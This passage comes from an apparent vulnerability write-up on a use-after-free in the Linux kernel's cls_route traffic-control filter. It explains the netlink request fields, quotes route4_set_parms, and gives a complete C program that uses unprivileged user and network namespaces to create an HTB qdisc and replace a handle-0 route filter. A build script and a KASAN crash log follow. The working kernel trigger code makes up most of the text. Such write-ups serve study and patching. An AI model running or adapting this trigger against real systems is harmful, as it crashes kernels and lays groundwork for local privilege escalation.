    /* Set attributes: TCA_KIND, then TCA_HTB_INIT nested in TCA_OPTIONS */
    addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_KIND, kind, strlen(kind));
    tail = addattr_nest(&qdreq.hdr, sizeof(qdreq), TCA_OPTIONS);
    memset(&glob, 0, sizeof(glob));
    glob.version = 0x00030011 >> 16;
    addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_HTB_INIT,
              &glob, sizeof(glob));
    addattr_nest_end(&qdreq.hdr, tail);

    err = rtnl_talk(&rth, &qdreq.hdr, NULL, 0);
    if (err < 0)
        die("rtnl_talk");

    rtnl_close(&rth);
}

int main(int argc, char *argv[])
{
    int res;

    res = unshare(CLONE_NEWUSER | CLONE_NEWNET);
    if (res == -1)
        die("unshare");

    user_tc_modify_qdisc("lo",
                         RTM_NEWQDISC,
                         NLM_F_CREATE,
                         0x10000,
                         "htb");
    return 0;
}
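Traffic Control Filter
The vulnerability can be triggered when a filter whose handle is 0 is removed by being replaced, so such a filter has to be created first. The elements that have to be set for this are as follows [3, 8].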
| nlmsghdr member | Value |
|---|---|
| nlmsg_len | NLMSG_LENGTH(sizeof(< subsystem header structure variable >)) |
| nlmsg_flags | NLM_F_REQUEST \| NLM_F_CREATE |
| nlmsg_type | RTM_NEWTFILTER |

| tcmsg member | Value |
|---|---|
| tcm_family | AF_UNSPEC |
| tcm_ifindex | ifindex of the network interface |
| tcm_info | 32-bit value with a nonzero prio in the high 16 bits and proto in the low 16 bits (e.g., prio=0xbeef and proto=ETH_P_LOOP) |
| tcm_handle | 0x0 |

| Attribute | Value |
|---|---|
| TCA_KIND | "route" |
| TCA_OPTIONS | Not NULL |
| TCA_ROUTE4_TO | 0x100000000 (64-bit) |
| TCA_ROUTE4_FROM | 0x100000000 (64-bit) |
Here prio is set to a nonzero value so that route4_get obtains the same head pointer across repeated calls. A function that does this can be written as follows [3].
enum {
    TCA_BUF_MAX = (64 * 1024)
};

struct tc_req {
    struct nlmsghdr hdr;
    struct tcmsg tchdr;
    uint8_t buf[TCA_BUF_MAX];
};

void die(const char *funcname)
{
    perror(funcname);
    exit(EXIT_FAILURE);
}

#define LOG printf
#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)

void user_tc_new_tfilter(const char *ifname, int cmd,
                         unsigned int flags, uint32_t handle, uint16_t prio,
                         uint16_t proto,
                         const char *kind, uint64_t from, uint64_t to)
{
    int err;
    struct rtnl_handle rthdle;
    struct tc_req req;
    struct rtattr *tail;

    LOG_FUNC();

    err = rtnl_open(&rthdle, 0);
    if (err < 0)
        die("rtnl_open");

    memset(&req, 0, sizeof(req));
    req.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(req.tchdr));
    req.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
    req.hdr.nlmsg_type = cmd;

    req.tchdr.tcm_family = AF_UNSPEC;
    req.tchdr.tcm_ifindex = if_nametoindex(ifname);
    /* Widen prio before shifting: a uint16_t is promoted to int, and
     * shifting 0xbeef left by 16 would overflow a signed int. */
    req.tchdr.tcm_info = TC_H_MAKE((uint32_t)prio << 16, proto);
    req.tchdr.tcm_handle = handle;

    addattr_l(&req.hdr, sizeof(req),
              TCA_KIND,
              kind, strlen(kind));
    tail = addattr_nest(&req.hdr, sizeof(req), TCA_OPTIONS);
    addattr64(&req.hdr, sizeof(req),
              TCA_ROUTE4_TO,
              to);
    addattr64(&req.hdr, sizeof(req),
              TCA_ROUTE4_FROM,
              from);
    addattr_nest_end(&req.hdr, tail);

    err = rtnl_talk(&rthdle, &req.hdr, NULL, 0);
    if (err < 0)
        die("rtnl_talk");

    rtnl_close(&rthdle);
}

int main(int argc, char *argv[])
{
    int res;

    res = unshare(CLONE_NEWUSER | CLONE_NEWNET);
    if (res == -1)
        die("unshare");

    user_tc_new_tfilter("lo",
                        RTM_NEWTFILTER,
                        NLM_F_CREATE,
                        0x0,
                        0xbeef, ETH_P_LOOP,
                        "route",
                        0x100000000, 0x100000000);
    return 0;
}
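The tcm_info field used above packs two 16-bit values into one word. A small sketch of the packing and unpacking with the TC_H_ macros from linux/pkt_sched.h follows; make_tcm_info, tcm_info_prio, and tcm_info_proto are hypothetical helper names, and the claim that the kernel splits the field the same way is my reading of tc_new_tfilter rather than something shown in the excerpts.

```c
#include <assert.h>
#include <stdint.h>
#include <linux/pkt_sched.h>    /* TC_H_MAKE, TC_H_MAJ, TC_H_MIN */

/* Pack prio into the high 16 bits and proto into the low 16 bits. */
uint32_t make_tcm_info(uint16_t prio, uint16_t proto)
{
    /* Widen before shifting so the shift happens on an unsigned 32-bit value. */
    return TC_H_MAKE((uint32_t)prio << 16, proto);
}

/* Recover the priority (major part) from a packed tcm_info value. */
uint16_t tcm_info_prio(uint32_t info)
{
    return (uint16_t)(TC_H_MAJ(info) >> 16);
}

/* Recover the protocol (minor part) from a packed tcm_info value. */
uint16_t tcm_info_proto(uint32_t info)
{
    return (uint16_t)TC_H_MIN(info);
}
```

With prio=0xbeef and proto=ETH_P_LOOP (0x0060), the packed value is 0xbeef0060, and both parts come back unchanged when unpacked.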
Putting it all together
Now let's combine everything described so far with a filter replacement to trigger the UAF. To replace the filter, the new filter has to be created with TCA_ROUTE4_FROM and TCA_ROUTE4_TO values that differ from the existing ones, because otherwise an EEXIST error can occur. The route4_set_parms function shows why (excerpt from net/sched/cls_route.c) [3].
static int route4_set_parms(struct net *net, struct tcf_proto *tp,
                            unsigned long base, struct route4_filter *f,
                            u32 handle, struct route4_head *head,
                            struct nlattr **tb, struct nlattr *est, int new,
                            u32 flags, struct netlink_ext_ack *extack)
{
    u32 id = 0, to = 0, nhandle = 0x8000;
    struct route4_filter *fp;
    unsigned int h1;
    struct route4_bucket *b;
    int err;

    err = tcf_exts_validate(net, tp, tb, est, &f->exts, flags, extack);
    if (err < 0)
        return err;

    if (tb[TCA_ROUTE4_TO]) {
        if (new && handle & 0x8000)
            return -EINVAL;
        to = nla_get_u32(tb[TCA_ROUTE4_TO]);
        if (to > 0xFF)
            return -EINVAL;
        nhandle = to;
    }

    if (tb[TCA_ROUTE4_FROM]) {
        if (tb[TCA_ROUTE4_IIF])
            return -EINVAL;
        id = nla_get_u32(tb[TCA_ROUTE4_FROM]);
        if (id > 0xFF)
            return -EINVAL;
        nhandle |= id << 16;
    } else if (tb[TCA_ROUTE4_IIF]) {
        id = nla_get_u32(tb[TCA_ROUTE4_IIF]);
        if (id > 0x7FFF)
            return -EINVAL;
        nhandle |= (id | 0x8000) << 16;
    } else
        nhandle |= 0xFFFF << 16;

    if (handle && new) {
        nhandle |= handle & 0x7F00;
        if (nhandle != handle)
            return -EINVAL;
    }

    h1 = to_hash(nhandle);
    b = rtnl_dereference(head->table[h1]);
    if (!b) {
        b = kzalloc(sizeof(struct route4_bucket), GFP_KERNEL);
        if (b == NULL)
            return -ENOBUFS;

        rcu_assign_pointer(head->table[h1], b);
    } else {
        unsigned int h2 = from_hash(nhandle >> 16);

        for (fp = rtnl_dereference(b->ht[h2]);
             fp;
             fp = rtnl_dereference(fp->next))
            if (fp->handle == f->handle)
                return -EEXIST;
    }

    /* ... */

    return 0;
}
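The nhandle arithmetic in the excerpt decides which bucket the new filter is checked against, so it helps to be able to compute it by hand. The following user-space sketch mirrors only that arithmetic: sketch_nhandle is a hypothetical name, the has_ flags stand for "attribute present", and the checks that depend on the caller-supplied handle and the new flag are left out.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Mirror of the nhandle computation in the excerpt above.
 * Returns false where the excerpt would return -EINVAL. */
bool sketch_nhandle(bool has_to, uint32_t to,
                    bool has_from, uint32_t from,
                    bool has_iif, uint32_t iif,
                    uint32_t *out)
{
    uint32_t nhandle = 0x8000;

    if (has_to) {
        if (to > 0xFF)
            return false;
        nhandle = to;
    }

    if (has_from) {
        if (has_iif || from > 0xFF)
            return false;
        nhandle |= from << 16;
    } else if (has_iif) {
        if (iif > 0x7FFF)
            return false;
        nhandle |= (iif | 0x8000) << 16;
    } else {
        nhandle |= 0xFFFFu << 16;
    }

    *out = nhandle;
    return true;
}

/* What a 32-bit read sees of a 64-bit attribute value on a little-endian
 * machine: only the low 32 bits. */
uint32_t low32(uint64_t v)
{
    return (uint32_t)v;
}
```

Assuming a little-endian machine, the 64-bit value 0x100000000 sent earlier reads back as 0 through nla_get_u32, so TO=0 and FROM=0 yield nhandle 0, while TO=1 and FROM=1 would yield 0x10001 and land in a different bucket.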
The code that triggers the UAF can then be written as follows [8].
1#define _GNU_SOURCE
2
3#include <stdio.h>
4#include <string.h>
5#include <stdlib.h>
6#include <stdint.h>
7#include <stdbool.h>
8#include <signal.h>
9#include <time.h>
10#include <sys/mman.h>
11#include <sys/types.h>
12#include <sys/utsname.h>
13#include <sys/wait.h>
14#include <sys/socket.h>
15#include <sys/ioctl.h>
16#include <sys/uio.h>
17#include <unistd.h>
18#include <sched.h>
19#include <fcntl.h>
20#include <syslog.h>
21#include <errno.h>
22#include <netinet/in.h>
23#include <arpa/inet.h>
24#include <net/if.h>
25#include <net/if_arp.h>
26#include <linux/if_link.h>
27#include <linux/neighbour.h>
28#include <linux/netconf.h>
29#include <linux/if_ether.h>
30#include <asm/types.h>
31#include <linux/netlink.h>
32#include <linux/rtnetlink.h>
33#include <libnl3/netlink/route/tc.h>
34#include <libnl3/netlink/route/qdisc.h>
35#include <libnl3/netlink/route/qdisc/tbf.h>
36
37/* ----------------------< libnetlink >--------------------------------- */
38
39struct rtnl_handle {
40 int fd;
41 struct sockaddr_nl local;
42 struct sockaddr_nl peer;
43 __u32 seq;
44 __u32 dump;
45 int proto;
46 FILE *dump_fp;
47#define RTNL_HANDLE_F_LISTEN_ALL_NSID 0x01
48 int flags;
49};
50
51#define NLMSG_TAIL(nmsg) \
52 ((struct rtattr *) (((void *) (nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))
53
54
55static inline const char *rta_getattr_str(const struct rtattr *rta)
56{
57 return (const char *)RTA_DATA(rta);
58}
59
60static int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
61 int alen)
62{
63 int len = RTA_LENGTH(alen);
64 struct rtattr *rta;
65
66 if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
67 fprintf(stderr,
68 "addattr_l ERROR: message exceeded bound of %d\n",
69 maxlen);
70 return -1;
71 }
72 rta = NLMSG_TAIL(n);
73 rta->rta_type = type;
74 rta->rta_len = len;
75 memcpy(RTA_DATA(rta), data, alen);
76 n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
77 return 0;
78}
79
80static int addattr32(struct nlmsghdr *n, int maxlen, int type, __u32 data)
81{
82 return addattr_l(n, maxlen, type, &data, sizeof(__u32));
83}
84
85static int addattr64(struct nlmsghdr *n, int maxlen, int type, __u64 data)
86{
87 return addattr_l(n, maxlen, type, &data, sizeof(__u64));
88}
89
90static struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type)
91{
92 struct rtattr *nest = NLMSG_TAIL(n);
93
94 addattr_l(n, maxlen, type, NULL, 0);
95 /* addattr_l(n, maxlen, type, &nest, 8); */
96 return nest;
97}
98
99static int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest)
100{
101 nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest;
102 return n->nlmsg_len;
103}
104
105#ifndef SOL_NETLINK
106#define SOL_NETLINK 270
107#endif
108
109#ifndef MIN
110#define MIN(a, b) ((a) < (b) ? (a) : (b))
111#endif
112
113static int rcvbuf =1024 * 1024;
114
115static void rtnl_close(struct rtnl_handle *rth)
116{
117 if (rth->fd >= 0) {
118 close(rth->fd);
119 rth->fd = -1;
120 }
121}
122
123static int rtnl_open_byproto(struct rtnl_handle *rth, unsigned int subscriptions,
124 int protocol)
125{
126 socklen_t addr_len;
127 int sndbuf = 32768;
128
129 memset(rth, 0, sizeof(*rth));
130
131 rth->proto = protocol;
132 rth->fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, protocol);
133 if (rth->fd < 0) {
134 perror("Cannot open netlink socket");
135 return -1;
136 }
137
138 if (setsockopt(rth->fd, SOL_SOCKET, SO_SNDBUF,
139 &sndbuf, sizeof(sndbuf)) < 0) {
140 perror("SO_SNDBUF");
141 return -1;
142 }
143
144 if (setsockopt(rth->fd, SOL_SOCKET, SO_RCVBUF,
145 &rcvbuf, sizeof(rcvbuf)) < 0) {
146 perror("SO_RCVBUF");
147 return -1;
148 }
149
150 memset(&rth->local, 0, sizeof(rth->local));
151 rth->local.nl_family = AF_NETLINK;
152 rth->local.nl_groups = subscriptions;
153
154 if (bind(rth->fd, (struct sockaddr *)&rth->local,
155 sizeof(rth->local)) < 0) {
156 perror("Cannot bind netlink socket");
157 return -1;
158 }
159 addr_len = sizeof(rth->local);
160 if (getsockname(rth->fd, (struct sockaddr *)&rth->local,
161 &addr_len) < 0) {
162 perror("Cannot getsockname");
163 return -1;
164 }
165 if (addr_len != sizeof(rth->local)) {
166 fprintf(stderr, "Wrong address length %d\n", addr_len);
167 return -1;
168 }
169 if (rth->local.nl_family != AF_NETLINK) {
170 fprintf(stderr, "Wrong address family %d\n",
171 rth->local.nl_family);
172 return -1;
173 }
174 rth->seq = time(NULL);
175 return 0;
176}
177
178static int rtnl_open(struct rtnl_handle *rth, unsigned int subscriptions)
179{
180 return rtnl_open_byproto(rth, subscriptions, NETLINK_ROUTE);
181}
182
static int __rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
		       struct nlmsghdr *answer, size_t maxlen,
		       bool show_rtnl_err)
{
	int status;
	unsigned int seq;
	struct nlmsghdr *h;
	struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
	struct iovec iov = {
		.iov_base = n,
		.iov_len = n->nlmsg_len
	};
	struct msghdr msg = {
		.msg_name = &nladdr,
		.msg_namelen = sizeof(nladdr),
		.msg_iov = &iov,
		.msg_iovlen = 1,
	};
	char buf[32768] = {};

	n->nlmsg_seq = seq = ++rtnl->seq;

	if (answer == NULL)
		n->nlmsg_flags |= NLM_F_ACK;

	status = sendmsg(rtnl->fd, &msg, 0);
	if (status < 0) {
		perror("Cannot talk to rtnetlink");
		return -1;
	}

	iov.iov_base = buf;
	while (1) {
		iov.iov_len = sizeof(buf);
		status = recvmsg(rtnl->fd, &msg, 0);

		if (status < 0) {
			if (errno == EINTR || errno == EAGAIN)
				continue;
			fprintf(stderr, "netlink receive error %s (%d)\n",
				strerror(errno), errno);
			return -1;
		}
		if (status == 0) {
			fprintf(stderr, "EOF on netlink\n");
			return -1;
		}
		if (msg.msg_namelen != sizeof(nladdr)) {
			fprintf(stderr,
				"sender address length == %d\n",
				msg.msg_namelen);
			exit(1);
		}
		for (h = (struct nlmsghdr *)buf; status >= sizeof(*h); ) {
			int len = h->nlmsg_len;
			int l = len - sizeof(*h);

			/* DumpHex(&msg, len); */

			if (l < 0 || len > status) {
				if (msg.msg_flags & MSG_TRUNC) {
					fprintf(stderr, "Truncated message\n");
					return -1;
				}
				fprintf(stderr,
					"!!!malformed message: len=%d\n",
					len);
				exit(1);
			}

			if (nladdr.nl_pid != 0 ||
			    h->nlmsg_pid != rtnl->local.nl_pid ||
			    h->nlmsg_seq != seq) {
				/* Don't forget to skip that message. */
				status -= NLMSG_ALIGN(len);
				h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
				continue;
			}

			if (h->nlmsg_type == NLMSG_ERROR) {
				struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(h);

				if (l < sizeof(struct nlmsgerr)) {
					fprintf(stderr, "ERROR truncated\n");
				} else if (!err->error) {
					if (answer)
						memcpy(answer, h,
						       MIN(maxlen, h->nlmsg_len));
					return 0;
				}

				if (rtnl->proto != NETLINK_SOCK_DIAG && show_rtnl_err)
					fprintf(stderr,
						"RTNETLINK answers: %s\n",
						strerror(-err->error));
				errno = -err->error;
				return -1;
			}

			if (answer) {
				memcpy(answer, h,
				       MIN(maxlen, h->nlmsg_len));
				return 0;
			}

			fprintf(stderr, "Unexpected reply!!!\n");

			status -= NLMSG_ALIGN(len);
			h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
		}

		if (msg.msg_flags & MSG_TRUNC) {
			fprintf(stderr, "Message truncated\n");
			continue;
		}

		if (status) {
			fprintf(stderr, "!!!Remnant of size %d\n", status);
			exit(1);
		}
	}
}

static int rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
		     struct nlmsghdr *answer, size_t maxlen)
{
	return __rtnl_talk(rtnl, n, answer, maxlen, true);
}

static int parse_rtattr_flags(struct rtattr *tb[], int max, struct rtattr *rta,
			      int len, unsigned short flags)
{
	unsigned short type;

	memset(tb, 0, sizeof(struct rtattr *) * (max + 1));
	while (RTA_OK(rta, len)) {
		type = rta->rta_type & ~flags;
		if ((type <= max) && (!tb[type]))
			tb[type] = rta;
		rta = RTA_NEXT(rta, len);
	}
	if (len)
		fprintf(stderr, "!!!Deficit %d, rta_len=%d\n",
			len, rta->rta_len);
	return 0;
}

/* --------------------------------------------------------------------- */

enum {
	TCA_BUF_MAX = (64 * 1024)
};

struct tc_req {
	struct nlmsghdr hdr;
	struct tcmsg tchdr;
	uint8_t buf[TCA_BUF_MAX];
};

void die(const char *funcname)
{
	perror(funcname);
	exit(EXIT_FAILURE);
}

#define LOG printf
#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)

void print_qdisc_info(const char *ifname)
{
	int err;
	/* rtnl_talk() copies the whole reply here, so the buffer needs room
	 * for the attributes as well, not just a bare struct nlmsghdr. */
	struct tc_req res;
	struct tcmsg *t;
	struct rtattr *tb[TCA_MAX + 1];
	struct rtnl_handle rth;
	struct tc_req qdreq;

	LOG_FUNC();

	err = rtnl_open(&rth, 0);
	if (err)
		die("rtnl_open");

	bzero(&qdreq, sizeof(qdreq));
	bzero(&res, sizeof(res));
	qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
	qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
	qdreq.hdr.nlmsg_type = RTM_GETQDISC;

	qdreq.tchdr.tcm_family = AF_UNSPEC;
	qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);

	LOG("ifindex: %d\n", qdreq.tchdr.tcm_ifindex);

	err = rtnl_talk(&rth, &qdreq.hdr, &res.hdr, sizeof(res));
	if (err < 0)
		die("rtnl_talk");

	t = NLMSG_DATA(&res.hdr);
	if (res.hdr.nlmsg_type != RTM_NEWQDISC &&
	    res.hdr.nlmsg_type != RTM_DELQDISC) {
		/* Not an errno failure, so report it without perror(). */
		fprintf(stderr, "Not a qdisc\n");
		exit(EXIT_FAILURE);
	}

	parse_rtattr_flags(tb,
			   TCA_MAX,
			   TCA_RTA(t),
			   res.hdr.nlmsg_len - NLMSG_LENGTH(sizeof(*t)),
			   NLA_F_NESTED);
	printf("qdisc %s %x:[%08x]\n", rta_getattr_str(tb[TCA_KIND]),
	       t->tcm_handle >> 16, t->tcm_handle);

	rtnl_close(&rth);
}

void user_tc_modify_qdisc(const char *ifname, int cmd, unsigned int flags,
			  uint32_t handle, const char *kind)
{
	int err;
	struct rtnl_handle rth;
	struct tc_req qdreq;
	struct rtattr *tail;
	struct tc_htb_glob glob;

	LOG_FUNC();

	err = rtnl_open(&rth, 0);
	if (err)
		die("rtnl_open");

	/* Zero the request so that fields not set below (e.g. tcm_info)
	 * do not carry stack garbage into the kernel. */
	bzero(&qdreq, sizeof(qdreq));
	qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
	qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
	qdreq.hdr.nlmsg_type = cmd;

	qdreq.tchdr.tcm_family = AF_UNSPEC;
	qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
	qdreq.tchdr.tcm_handle = handle;
	qdreq.tchdr.tcm_parent = TC_H_ROOT;

	addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_KIND, kind, strlen(kind));
	tail = addattr_nest(&qdreq.hdr, sizeof(qdreq), TCA_OPTIONS);
	bzero(&glob, sizeof(glob));
	glob.version = 0x00030011 >> 16;	/* major version, i.e. 3 */
	addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_HTB_INIT,
		  &glob, sizeof(glob));
	addattr_nest_end(&qdreq.hdr, tail);

	err = rtnl_talk(&rth, &qdreq.hdr, NULL, 0);
	if (err < 0)
		die("rtnl_talk");

	rtnl_close(&rth);
}

void user_tc_new_tfilter(const char *ifname, int cmd,
			 unsigned int flags, uint32_t handle, uint16_t prio,
			 uint16_t proto,
			 const char *kind, uint64_t from, uint64_t to)
{
	int err;
	struct rtnl_handle rthdle;
	struct tc_req req;
	struct rtattr *tail;

	LOG_FUNC();

	err = rtnl_open(&rthdle, 0);
	if (err < 0)
		die("rtnl_open");

	bzero(&req, sizeof(req));
	req.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(req.tchdr));
	req.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
	req.hdr.nlmsg_type = cmd;

	req.tchdr.tcm_family = AF_UNSPEC;
	req.tchdr.tcm_ifindex = if_nametoindex(ifname);
	req.tchdr.tcm_info = TC_H_MAKE(prio << 16, proto);
	req.tchdr.tcm_handle = handle;

	addattr_l(&req.hdr, sizeof(req),
		  TCA_KIND,
		  kind, strlen(kind));
	tail = addattr_nest(&req.hdr, sizeof(req), TCA_OPTIONS);
	addattr64(&req.hdr, sizeof(req),
		  TCA_ROUTE4_TO,
		  to);
	addattr64(&req.hdr, sizeof(req),
		  TCA_ROUTE4_FROM,
		  from);
	addattr_nest_end(&req.hdr, tail);

	err = rtnl_talk(&rthdle, &req.hdr, NULL, 0);
	if (err < 0)
		die("rtnl_talk");

	rtnl_close(&rthdle);
}

int main(void)
{
	int res;

	/* Enter new user and network namespaces so that an unprivileged
	 * process may configure tc on its own "lo" interface. */
	res = unshare(CLONE_NEWUSER | CLONE_NEWNET);
	if (res == -1)
		die("unshare");

	user_tc_modify_qdisc("lo",
			     RTM_NEWQDISC,
			     NLM_F_CREATE,
			     0x10000,
			     "htb");
	print_qdisc_info("lo");

	/* First filter: the low 32 bits of from/to are 0. */
	user_tc_new_tfilter("lo",
			    RTM_NEWTFILTER,
			    NLM_F_CREATE,
			    0x0,
			    0xbeef, ETH_P_LOOP,
			    "route",
			    0x100000000, 0x100000000);
	/* Second filter: same priority, protocol and tcm_handle (0),
	 * but from = to = 1. */
	user_tc_new_tfilter("lo",
			    RTM_NEWTFILTER,
			    NLM_F_CREATE,
			    0x0,
			    0xbeef, ETH_P_LOOP,
			    "route",
			    0x1, 0x1);
	/* Exiting drops the last reference to the network namespace,
	 * which triggers its cleanup. */
	return 0;
}
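The two user_tc_new_tfilter calls in main differ only in their from/to values. The following is a minimal sketch, not kernel code, of how those values would turn into filter handles and bucket indices. It assumes the 5.18 handle derivation for the case where only TCA_ROUTE4_TO and TCA_ROUTE4_FROM are supplied, and a little-endian host. The model_* names are hypothetical helpers introduced for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Simplified model (assumption) of how cls_route derives a filter handle
 * when only TO and FROM are given. Returns -1 where the kernel would be
 * expected to reject the value. */
static int64_t model_route4_handle(uint64_t to_attr, uint64_t from_attr)
{
	/* The kernel reads each attribute as a u32; on a little-endian host
	 * that is the low half of the 8 bytes sent by addattr64(). */
	uint32_t to = (uint32_t)to_attr;
	uint32_t from = (uint32_t)from_attr;

	if (to > 0xFF || from > 0xFF)
		return -1;
	return (int64_t)(to | (from << 16));
}

/* Bucket indices in the sense of route4_get(): table[h1]->ht[h2].
 * Only modeled for small handles (bit 15 clear, ids up to 0xFF). */
static unsigned int model_to_hash(uint32_t handle)
{
	assert((handle & 0x8000) == 0);
	return handle & 0xFF;
}

static unsigned int model_from_hash(uint32_t handle)
{
	assert(((handle >> 16) & 0xFFFF) <= 0xFF);
	return (handle >> 16) & 0xF;
}
```

Under these assumptions the first request yields handle 0 and the second yields 0x10001. Because the second request again carries tcm_handle 0, the lookup in route4_get would return the handle-0 filter, which then reaches route4_change as fold.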
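The code above can be compiled with the following script.
#!/bin/bash

src=$1
# Strip the trailing .c to get the output name
exe=${src%.c}

gcc -I/usr/include/libnl3/ "$src" -o "$exe" -lnl-3 -lmnl -lnl-route-3
Running the resulting binary produces the following kernel log.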
[ 3136.361496] ==================================================================
[ 3136.364037] BUG: KASAN: use-after-free in route4_destroy+0x190/0x4d0 [cls_route]
[ 3136.365314] Read of size 8 at addr ffff88800ba2d000 by task kworker/u4:0/1427
[ 3136.366115]
[ 3136.366350] CPU: 1 PID: 1427 Comm: kworker/u4:0 Not tainted 5.18.0 #1
[ 3136.367041] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
[ 3136.368194] Workqueue: netns cleanup_net
[ 3136.368693] Call Trace:
[ 3136.369014] <TASK>
[ 3136.369306] dump_stack_lvl+0x49/0x60
[ 3136.369757] print_report.cold+0x5e/0x5d0
[ 3136.370253] ? route4_destroy+0x190/0x4d0 [cls_route]
[ 3136.370831] kasan_report+0xaa/0x120
[ 3136.371282] ? route4_destroy+0x190/0x4d0 [cls_route]
[ 3136.371856] __asan_load8+0x87/0xb0
[ 3136.372285] route4_destroy+0x190/0x4d0 [cls_route]
[ 3136.372842] ? route4_init+0x60/0x60 [cls_route]
[ 3136.373404] ? __kasan_check_write+0x14/0x20
[ 3136.373909] ? mutex_unlock+0x81/0xd0
[ 3136.374367] tcf_proto_destroy+0x54/0x150
[ 3136.374863] tcf_proto_put+0x5b/0x80
[ 3136.375300] tcf_chain_flush+0xdf/0x150
[ 3136.375759] __tcf_block_put+0xea/0x1c0
[ 3136.376458] tcf_block_put+0xca/0x110
[ 3136.376928] ? tcf_block_put_ext+0x60/0x60
[ 3136.377424] htb_destroy+0xed/0x760 [sch_htb]
[ 3136.377943] ? rcu_exp_wait_wake+0x570/0x570
[ 3136.378455] ? htb_destroy_class_offload+0x830/0x830 [sch_htb]
[ 3136.379140] ? htb_reset+0x1dd/0x2a0 [sch_htb]
[ 3136.379699] ? qdisc_reset+0x1dd/0x280
[ 3136.380268] qdisc_destroy+0x63/0x150
[ 3136.380764] qdisc_put+0x6b/0x80
[ 3136.381373] dev_shutdown+0x129/0x180
[ 3136.382049] unregister_netdevice_many+0x4dd/0xc50
[ 3136.382872] ? __kasan_check_read+0x11/0x20
[ 3136.383549] ? dev_cpu_dead+0x400/0x400
[ 3136.384121] ? unregister_netdevice_many+0xc50/0xc50
[ 3136.384876] default_device_exit_batch+0x2df/0x370
[ 3136.385603] ? __dev_change_net_namespace+0xaf0/0xaf0
[ 3136.386357] ops_exit_list+0x92/0xa0
[ 3136.386927] cleanup_net+0x2f3/0x5e0
[ 3136.387493] ? unregister_pernet_device+0x60/0x60
[ 3136.388204] ? rtnl_unlock+0xe/0x20
[ 3136.388757] process_one_work+0x44f/0x740
[ 3136.389400] worker_thread+0x2bb/0x6f0
[ 3136.389986] ? process_one_work+0x740/0x740
[ 3136.390629] kthread+0x179/0x1b0
[ 3136.392849] ? kthread_complete_and_exit+0x30/0x30
[ 3136.395048] ret_from_fork+0x22/0x30
[ 3136.397079] </TASK>
[ 3136.398830]
[ 3136.400410] Allocated by task 1445:
[ 3136.402366]
[ 3136.403954] Freed by task 1427:
[ 3136.405785]
[ 3136.407233] Last potentially related work creation:
[ 3136.409123]
[ 3136.410537] Second to last potentially related work creation:
[ 3136.412539]
[ 3136.414005] The buggy address belongs to the object at ffff88800ba2d000
[ 3136.414005] which belongs to the cache kmalloc-192 of size 192
[ 3136.418199] The buggy address is located 0 bytes inside of
[ 3136.418199] 192-byte region [ffff88800ba2d000, ffff88800ba2d0c0)
[ 3136.422262]
[ 3136.423764] The buggy address belongs to the physical page:
[ 3136.425828]
[ 3136.427344] Memory state around the buggy address:
[ 3136.429290]  ffff88800ba2cf00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3136.431594]  ffff88800ba2cf80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3136.433601] >ffff88800ba2d000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 3136.435610]                    ^
[ 3136.437281]  ffff88800ba2d080: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[ 3136.439355]  ffff88800ba2d100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 3136.441418] ==================================================================
[ 3136.444173] general protection fault, probably for non-canonical address 0x92a000ea00000593: 0000 [#1] PREEMPT SMP KASAN PTI
[ 3136.447177] CPU: 1 PID: 1427 Comm: kworker/u4:0 Tainted: G B W 5.18.0 #1
[ 3136.449696] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
[ 3136.452337] Workqueue: netns cleanup_net
[ 3136.454369] RIP: 0010:tcf_action_destroy+0x85/0xd0
[ 3136.456484] Code: ff 48 83 c3 08 48 39 5d d0 74 55 48 89 df e8 f2 ed 31 ff 4c 8b 23 4d 85 e4 74 45 48 c7 03 00 00 00 00 4c 89 e7 e8 db ed 31 f
[ 3136.461858] RSP: 0018:ffff888102d0f6a8 EFLAGS: 00010296
[ 3136.464262] RAX: 0000000000000000 RBX: ffff888107ef9008 RCX: ffffffffa622a125
[ 3136.466742] RDX: 0000000000000000 RSI: 0000000000000008 RDI: 92a000ea00000593
[ 3136.469217] RBP: ffff888102d0f6d8 R08: 0000000000000001 R09: 0000000000000003
